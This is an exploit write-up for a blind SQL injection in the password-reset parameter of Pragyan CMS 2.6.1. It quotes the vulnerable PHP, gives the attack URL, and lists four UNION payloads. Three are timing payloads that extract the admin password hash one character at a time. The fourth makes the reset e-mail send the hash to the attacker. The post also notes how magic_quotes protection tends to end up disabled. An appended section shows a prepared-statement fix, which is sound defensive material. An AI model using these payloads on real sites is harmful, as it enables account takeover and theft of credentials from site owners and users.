vladiii

Pragyan CMS 2.6.1 Blind SQL Injection


In /cms/login.lib:

$key = $_GET['key'];
$user_email = $_GET['resetPasswd'];   // taken straight from the query string
$password = rand();
$dbpassword = md5($password);
// $user_email is concatenated into the SQL string without any escaping
$query = "SELECT * FROM `" . MYSQL_DATABASE_PREFIX . "users` WHERE `user_email`='" . $user_email . "'";
$result = mysql_query($query);

Because of .htaccess, the link with the vulnerable parameter will be:

http://site.xxx/home/+login&subaction=resetPasswd&key=asd&resetPasswd=[SQL]

[SQL1] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_email='adresadeemail@mail.com

[SQL2] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_id='1

[SQL3] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_name='admin

[SQL 4 - sysgh0st's version [innovation!]] = ' UNION ALL SELECT 1,2,CONCAT('mail@mail.com;',(SELECT `user_password` FROM `pragyanv2_users` WHERE `user_id`=1),'@',(SELECT `user_name` FROM `pragyanv2_users` WHERE `user_id`=1),'.org'),4,5,6,7,8#
This one sends the password by e-mail!

NOTE! The syntax only works if magic_quotes_gpc is off in php.ini! In .htaccess we have:

##Enable magic quotes in PHP, in case it is turned off in php.ini
php_flag magic_quotes_gpc on

On some Apache setups that directive can cause a 500 error (because of php_flag) (there are cases where .htaccess is removed or even deleted), and the user (obviously! :D) will remove the php_flag_blabla line! So the final condition would be magic_quotes_gpc = off.

Good luck!
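For comparison, here is the same e-mail lookup written with a prepared statement, so that the resetPasswd value is bound as data rather than spliced into the SQL text. This is an added example, not code from Pragyan CMS or from the post above; it assumes an existing mysqli connection in $mysqli, the MYSQL_DATABASE_PREFIX constant the original snippet references, and a PHP build with mysqlnd (for get_result()). Unlike the original, it does not depend on magic_quotes_gpc at all.

```php
<?php
// Added example (not Pragyan CMS code): the reset-password lookup from
// /cms/login.lib rewritten with a mysqli prepared statement.
// Assumes $mysqli is an open mysqli connection and MYSQL_DATABASE_PREFIX
// is defined, as in the original snippet.

function findUserByEmail(mysqli $mysqli, string $userEmail): ?array
{
    // The table name comes from a constant, not from user input, so it
    // can be interpolated; the e-mail is bound as a parameter instead.
    $table = '`' . MYSQL_DATABASE_PREFIX . 'users`';
    $stmt = $mysqli->prepare("SELECT * FROM $table WHERE `user_email` = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $mysqli->error);
    }
    $stmt->bind_param('s', $userEmail);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The value from the advisory's URL arrives in $_GET['resetPasswd'].
// Validate its shape first; anything that is not an e-mail address
// (for example a string starting with "' UNION SELECT") is rejected here.
$userEmail = filter_input(INPUT_GET, 'resetPasswd', FILTER_VALIDATE_EMAIL);
if ($userEmail === null || $userEmail === false) {
    http_response_code(400);
    exit('invalid e-mail address');
}

// Even if validation were skipped, the bound parameter is compared
// literally against user_email, so a payload simply matches no row.
$user = findUserByEmail($mysqli, $userEmail);
```

The two layers are independent: the FILTER_VALIDATE_EMAIL check stops malformed input early and gives a clean error, while the prepared statement is what actually removes the injection, so the query stays safe even on a code path where the validation is forgotten.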
